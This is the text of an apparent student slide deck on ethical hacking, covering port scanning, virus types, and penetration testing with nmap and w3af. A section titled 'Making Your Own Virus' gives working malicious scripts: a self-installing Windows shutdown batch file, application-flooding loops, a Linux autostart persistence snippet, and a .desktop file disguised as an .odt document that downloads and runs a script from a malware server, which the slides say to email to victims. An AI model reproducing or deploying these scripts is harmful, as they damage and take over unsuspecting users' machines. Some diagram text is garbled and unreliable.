See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/316364069

Ethical Hacking

Presentation · November 2015

DOI: 10.13140/RG.2.2.21656.19204

CITATIONS READS

0 29,726

1 author:

Sahil Babbar
Indraprastha Institute of Information Technology
5 PUBLICATIONS   0 CITATIONS   

SEE PROFILE

Some of the authors of this publication are also working on these related projects:

Machine Learning/Artificial Intelligence View project

Security View project

All content following this page was uploaded by Sahil Babbar on 22 April 2017.

The user has requested enhancement of the downloaded file.

Ethical Hacking
Presented By: Sahil Babbar, Rachit Jain, Jinkeon Kang

Mentor: Megha Agrawal

 Contents

1. What is Hacking ?
2. Difference between Hacker & Cracker
3. What is Ethical Hacking ?
4. Hacker’s Skill Set

2
What Is Hacking ?

WHAT DO YOU THINK, WHO IS A HACKER ?

OR

3
What Is Hacking ?
Getting into a system/network using unauthorised methods to gain access to
sensitive information, BUT…

Hacker Cracker
• Technically Skilled Professional. • Technically Skilled Professional.
• Scan for vulnerabilities & pitfalls in • Scan for vulnerabilities & pitfalls in
the system/network architecture, the system/network architecture,
with permissions. without permissions.
• Doesn’t has any malicious intentions. • Has any malicious intentions.
• Hacking is done for productive • Cracking is done for thefts/damaging
4
causes. systems/fun.
What Is Ethical Hacking ?
Ethical Hacker is a skilled professional who hacks into a system/network to scan
for pitfalls and the probable targets that a Cracker might exploit.

Ethical Hacking ≈ Hacking Ethical Hacking ≠ Cracking

IMPORTANCE OF ETHICAL HACKING

• Helps to maintain privacy & full control.

• Helps to find system flaws and thereby avoiding leaking sensitive information
to Crackers.
• Since, computers are getting accessible to more and more people, ethical
hacking helps to maintain and strengthen computer security.
• Get appointed at esteemed government as well as multi-national organisations.

5
Hacker’s Skill Set
Knowledge about:

• Network Protocols like HTTP, HTTPS

• Authentication Techniques

• Firewall Architecture, Port Details

• Network Architectures

• Web Server Configurations

• Web Application Structures

• Database Setups with Client-Server Architecture

• HTML, JavaScript, Python, Ruby

• Shell Scripting

• And More…
6
Ethical Hacking Tools
• Vulnerability Scanners and • Packet Sniffers
their benefits
• Types of Vulnerability • Popular Hacking Tools
Scanners
• Password Cracking Tools
• Hacking Hardware

7
What are Hacking Tools?
❖ Hacking tools are software applications designed to serve one or
several specific purposes to hack/crack. These are used to make
complex hacking procedures, easy-to-use and nowadays, also offer
good GUI to help beginners in Ethical Hacking.

❖ There are numerous types of hacking tools like:

1) Vulnerability Scanners
2) Port Scanners
3) Web Application Scanners
4) Password Cracking Tools
5) Packet Sniffers

8
Vulnerability Scanner
❖ Vulnerability can be defined as an unknown flaw in software, hardware
or network which can exploited to gain unauthorised access.
❖ Vulnerability Scanner is a computer program that detects weak spots in
a network or computer system as a whole.
❖ Since, all the communication is done using ports on the network, the
vulnerability scanners detect open ports which can be used to exploit
weakness in the computer system.

9
Benefits of Vulnerability Scanner Run a software and show its
output here.

❖ Quick and Easy Detection of Weak Spots in computer system.

❖ Since, it helps in identifying the vulnerabilities, therefore, in-turn the
vulnerabilities can be fixed.
❖ Keeping a frequent check on the computer system.
❖ Example: Top 10 flashlight apps on Google Play Store.

This was found by Gary Miliefsky

at Snoop Wall with the help of
Vulnerability Scanners. These apps install
Trojans that cannot be removed without
doing Factory Reset.

All information is sucked up by the servers

mostly located in China, India and Russia.

10
Types of Vulnerability Scanners
Port Scanning

TCP Scanning SYN Scanning UDP Scanning Window Scanning

❖ Port Scanner is a software program that investigates(not attack) a

server for open and active ports by sending client requests to a range
of server port addresses. It is used to verify security policies or
compromise the services running on the ports.
❖ Port Sweep is the technique of scanning multiple hosts for
particular listening ports. Eg: SQL-based worms port sweep on
multiple servers looking for TCP port number 1433.
11
Types of Vulnerability Scanners: TCP Scanner

PORT #80

PORT #3000
Using TCP Scanner
Hacker/
SysAdmin HOST Address
192.168.1.1

PORT #8080

PORT #1433
Sending Carefully Constructed Packets
to each of 65536 ports Victim

Open or Accepted

Closed or Denied

Filtered, Dropped, Blocked

Types of Vulnerability Scanners: TCP Scanner
❖ TCP Scanner uses network functionalities of the operating system to
carry out the desired procedure.
❖ Procedure: Whenever the port on the host machine is open, TCP scanner
immediately closes the connection, if TCP three-way handshake is
completed, in order to prevent performing DoS(Denial-of-service) attack.
Because, if the connection is not closed an error code is generated and
registered in logs which can be detected by the system administrator.
❖ Advantage: Special level user privileges are not necessary.
❖ Disadvantages:
• Using OS functionalities, renders low-level control.
• “Noisy” method i.e. the services log the attacker’s IP Address and IDS
can raise alarm.

13
Types of Vulnerability Scanners: SYN Scanner

PORT #80

PORT #3000
Using SYN Scanner
Hacker/
SysAdmin HOST Address
192.168.1.1
SYN

Sending Raw SYN Packets PORT #8080

to each of 65536 ports
PORT #1433

Victim

Replies with RST Packet

in order to prevent
3-way TCP Handshake.
red
SYN-ACK ilte
unf
and
l osed
RST s c
p ort i
If
Types of Vulnerability Scanners: SYN Scanner
❖ Advantages:
• SYN Scanner has full control of the packets that are sent
to the host and can also monitor them like response
timeouts, response details, etc.
• Services running on the ports never actually establish a
connection. SYN scanning is also called ‘Half-Open
Scanning’ as full TCP connection is never established.
• RST packet can cause damage to the network devices
like printers, scanners.
❖ Disadvantages: SYN Scanner need privileges to generate
raw packets that initiate the whole process.

15
Types of Vulnerability Scanners: UDP Scanner

PORT #80

PORT #3000
Using UDP Scanner
Hacker/
Appl HOST Address
SysAdmin specifi ication
c UDP
Packe t 192.168.1.1

PORT #53

PORT #1433
Just dropping packets to detect
the state of the ports. Victim
t
p or
d ll
lose e wa
c fi r
Response contains whether fro
m
d by
ply ke
DNS Server is present or not Re b loc
rt he
n
ICMP port unreachable po w
fro
m
orts ble’
p a d
e ply o m each ocke
Port is open R fr r l
p ly t un is b
Re ‘hos age
All ports are open ss
me 16
Types of Vulnerability Scanners: UDP Scanner
❖ Advantages:
• UDP Scanner can detect the number of open and closed
ports by just dropping the packets and monitoring their
responses.
• Connection-less protocol.
❖ Disadvantages:
• UDP application-specific scanning is limited by the
number of ports for which application specific
investigation packet is available or not.
• Technical Challenges are involved.

17
Types of Vulnerability Scanners: Window Scanner

PORT #80

PORT #3000
Hacker/ Using Window Scanner
SysAdmin HOST Address
192.168.1.1

PORT #8080

PORT #1433

Victim

111111xxxxx

Window size of the packet

is pre-pended with 1’s due
to design flaw
Types of Vulnerability Scanners: Window Scanner

❖ Advantages:
❖ Disadvantages:
• Outdated
• Not trustworthy
• Nowadays, systems return the packet with pre-pended 0’s in the
window field, therefore, signalling all the ports as closed.
Types of Vulnerability Scanners: WebApp Scanner

Hacker/ Using WebApp HOST’s

Front
SysAdmin Scanner Website
End Address
CRUD Operations
Query DB 192.168.1.1
Transactions on DB

Victim
• Enables Black Box Testing.
• Black Box Testing is a kind of application/
system testing where the tester has no clue
about the business logic or processing of the
web application/software and just have the
information about the input and output.
• Scanner interacts with the UI and architecture
only but doesn’t scan source code.
Types of Vulnerability Scanners: WebApp Scanner

❖ Demo.
❖ Advantages:
❖ Very handy tools which enable quick testing of the overall web application
with less expertise.
❖ Full stack, from FrontEnd to BackEnd, can be tested with ease.
❖ Have good GUIs.
❖ Disadvantages:
❖ The same tools are used by the attackers, thereby, bringing user and
attacker on the same level.
❖ These are automated tools and help attackers to quickly test/find
vulnerabilities and send botnets.
❖ Less efficient and reliable as these tools are not regularly updated at the
same pace, with web application frameworks.
❖ Cannot detect logical errors in the source code.
Common Attacks &
Viruses

22
Virus
❖ Virus is a self replicating malware program that keeps on duplicating/
cloning itself and planting its copies in various data files, boot sector,
kernel, etc. They infect the area they reside in and often use stealth
techniques to hide from antivirus softwares or IDS’s.
❖ Some viruses don’t harm the computer and some render it useless!
❖ Viruses have been causing billions of dollars every year!

Hex Dump of Blaster Worm MacMag Virus on Mac(1988)

24
How it all started?
❖ Written in January 1986 called BRAIN by two brothers named Basit and
Amjad.
❖ Inspired by new functionalities in MS-DOS Operating System like multi-
tasking, new networking features.
❖ They left their full address, COPYRIGHT information and phone
numbers inside the code of BRAIN!
❖ What is does ?: Infects the boot sector of the floppy disk by replacing it
with a copy of the virus and the actual boot sector is moved to another
sector which is marked as bad. The bad sectors occupy 5KB of disk
space and makes 7KB of memory unavailable to MS-DOS. The malicious
sector is named ©BRAIN and some description text is seen.
❖ Why they wrote it ?: To catch copyright infringers. Really?
Types of Viruses

Email Browser Hijacker Boot Infectors FAT

Type of Viruses

Macro Memory Resident Overwrite Direct Action Directory

Macro Viruses
❖ These type of viruses are related to Macros which generally
come embedded in programs/files like word processors,
Microsoft Outlook, .mdb files, .xls files, etc. These viruses
come into being whenever the user opens that
document(that is why they are also called “document
viruses”) and start infecting the user’s computer.
lt er
e /A
c
pla Macro
Re

Macro Virus
Document

❖ Examples: Relax, Melissa.A, bablas, 097M/Y2K

27
Memory Resident Viruses
❖ Memory Resident Virus installs and plants itself as a part of the
Operating System, and it remain on RAM, whereas, non-memory-
resident virus scans the disks for vulnerable targets, after its
execution and infects them and exits from the computer.
Tries to access disk sector

Disk OS
Resident Virus

Virus directs the OS’s control flow the replication program, thereby, overwriting the
interrupt handlers and other OS functions and finally infecting the targets.

❖ Examples: Jerusalem, Onehalf, Magistr, Junkie, Satanbug, etc.

28
Web Scripting Virus
❖ Web Scripting Virus reside inside the complex code of
interactive web pages. This virus infects the complex code
in order to compromise the user’s privacy and security. It
can also infect browsers through the web pages and can
spread through emails, RSS feeds, advertisement banners,
etc. They can also breach access controls and are usually
used to attack website with large user-base like social
networking websites, banking websites, etc.
❖ This virus is planted by stealing cookies from the user
and then, the attacker can hijack the user’s session. In
this way, the attacker can impersonate the user and
this type of attack is called persistent attack.

❖ Example: JS.Fortnight 29
Browser Hijacker
❖ Browser Hijacker uses browsers as medium to get to the
victim’s computer either by faking the reality of
attachments/extensions/add-ons. They infect browser’s
functionalities like changing default settings without the
approval of the user, provide excessive advertisement
links, etc.

30
Browser Hijacker

Attackers use malicious Google Chrome extensions to compromise users.

31
Other Viruses
❖ Overwrite Viruses replaces the original information with
malicious code and they consume the same amount of file
size. This is one of the reasons that the IDS’s cannot detect
the infected files using file size conditions. These files
become useless in most cases.
❖ Examples: Trivial.88.D, TRj.reboot, etc.
❖ Direct Action Viruses take action iff when they are
executed or invoked due to a condition set by the hacker.
These type of viruses usually reside in the hard disk’s root
directory. They have a special feature that these viruses
keep on changing their location, constantly.
❖ Examples: Dir-2, Virdem, Vienna, etc.

32
Other Viruses
❖ Boot Infectors infect the storage devices like floppy disks,
hard disks but their record resides in a different location
altogether. These viruses infect the booting functionalities
of a computer as it directly infects the records in master
boot. The BRAIN virus is also a boot infector which is
extended to harm FAT entries, drives; massively reducing
the performance speed.
❖ FAT Viruses infect the File Allocation Table which is
responsible for maintaining all the information about disk
space, file locations, usable space, read-only space,
writable space, etc.

33
Making Your Own Virus
❖ What to know?
❖ Windows: Batch Files
❖ Mac OS: AppleScript
❖ Linux: Shell, Python, Ruby, etc.

❖ Batch Files are a type of scripts that run on Microsoft DOS

and all versions of Microsoft Windows Operating Systems.
These scripts are executed by command-line interpreter,
line-by-line and simply stored in plain text files. They have
.bat file extension. Conditional branching and looping are
also supported by the batch scripts.
34
Making Your Own Virus(Windows)
❖ Making Virus in Windows using Batch files:

Copy cute-virus.bat “C:\Users\sys\AppData\Roaming\Microsoft\Windows\StartMenu

\Programs\Startup

Shutdown -s -t 00

When the victim executes the batch file, it will plant itself in
the Startup folder of Windows and when the computer starts
up next time, it will shutdown automatically, in “0” seconds.
This type of virus is generally called “Shutdown Virus”.
35
Making Your Own Virus(Windows)
❖ Making Virus in Windows using Batch files:
@echo off // hiding batch commands
:X //variable
Start WinWord
Start mspaint
Start notepad
:
:
Start calc
Goto X

When the victim executes the batch file, it will start opening the applications in
the above order in an infinite loop. This type of virus is called “Application
Bomber”.

36
Making Your Own Virus(Mac OS)
❖ Let’s start cooking our own virus in Mac OS X.

37
Making Your Own Virus(Mac OS)
❖ We can write short scripts like below:
repeat
tell application “Google Chrome"
activate
end tell
tell application "RubyMine"
activate
end tell
tell application “Android Studio"
activate
end tell
end repeat
38
Making Your Own Virus(Linux)
❖ Making Virus in Linux KDE flavour, using Python Scripts.

import os

uname = os.getlogin()

drop_dir = “/home/%s/.kde/Autostart” % uname)

os.makedirs(drop_dir)

os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")

39
Making Your Own Virus(Linux)
Creating a desktop icon:
[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

40
Making Your Own Virus(Linux)
• Send this file over email to the victim

• So that once the file has been downloaded it will appear as

some_text.odt on the user’s desktop with the harmless
looking icon.

• And once the attachment is opened by the victim it will

infect the computer.
• This malware script will also restart whenever the user logs
in again into the computer.

41
Penetration Testing
❖ Penetration Testing is a technique of breaking into a
system/network legally, in order to identify vulnerabilities
and security flaws. It is also called Pen Testing or PT. PT is
done by a security expert and not by a hacker.
❖ Advantages
❖ PT helps in safeguarding the system/network from
several security attacks or vulnerabilities.
❖ PT helps to uncover security flaws to the system
administrator, who can better understand the nature and
potential of threats and exposes even minutest flaws.
❖ PT can be performed on wide variety of devices like
servers, wired/wireless networks, mobile devices, etc.
❖ Helps save money, which could have been lost to a
hacker. 42
Penetration Testing
❖ Not as easy as it seems!
❖ Following steps are involved in PT:
❖ Reconnaissance involves gathering all the required
specifications of the computer system/network
involved.
❖ Scanning involves searching the system/network for
vulnerabilities, security flaws and entry points.
❖ Exploitation involves using the vulnerabilities/flaws/
entry points to attack the system/network and gain
access.
❖ Maintaining Access involves maintaining the access to
system/network after exploitation and verifying what
extent of access can be maintained.
43
Penetration Testing
❖ Demo.

nmap -sP 192.168.1.1/24

This command discovers all the hosts that are up and running
on the network.

44
 nmap -sT -- reason 104.254.xxx.xxx
This command discovers the state of all the ports, the service running on them
and the reason for the status of the ports.
45
 nmap -A 104.254.xxx.xxx
This command discovers the state of all the ports, the service running on them
and the reason for the status of the ports.
46
47
 Zenmap
GUI Based Nmap Client

48
P.T. Tool #1: w3af

❖ W3AF: Web Application Attack and Audit Framework is a

penetration testing framework.
❖ Used for:
❖ Safe-guarding the web applications against attacks
❖ Can be used for attacking web applications
❖ Scanning Vulnerabilities
❖ Breaking Credentials
❖ And more 49
 Target URL

Type of Attack

P.T. Profiles

Home Screen

50
Scanning www.usebackpack.com and found information and errors regarding the web
application

51
Trying to decode the URL using Encode/Decode tool

52
Using the information to create Knowledge Base about the web application, in order to
find vulnerabilities and security flaws.

53
 Using the collected information to find vulnerabilities and security flaws.
Here, we have found a Distributed Authoring and Version (WebDAV) Misconfiguration
vulnerability.

54
Using the collected information to use different kind of exploits.

55
More vulnerability scanning of the web application which reveals more information.

56
Scanning some other host and found various vulnerabilities.

57
Listing only the vulnerabilities from the scanned information.

58
Getting the inter-linking diagram of all the URLs detected along with their respective
HTML, CSS and JS files.

59
P.T Tool #2: Metasploit

❖ Specialities:

60
61
62
63
Running an exploit is as simple as:

64
65
 66
View publication stats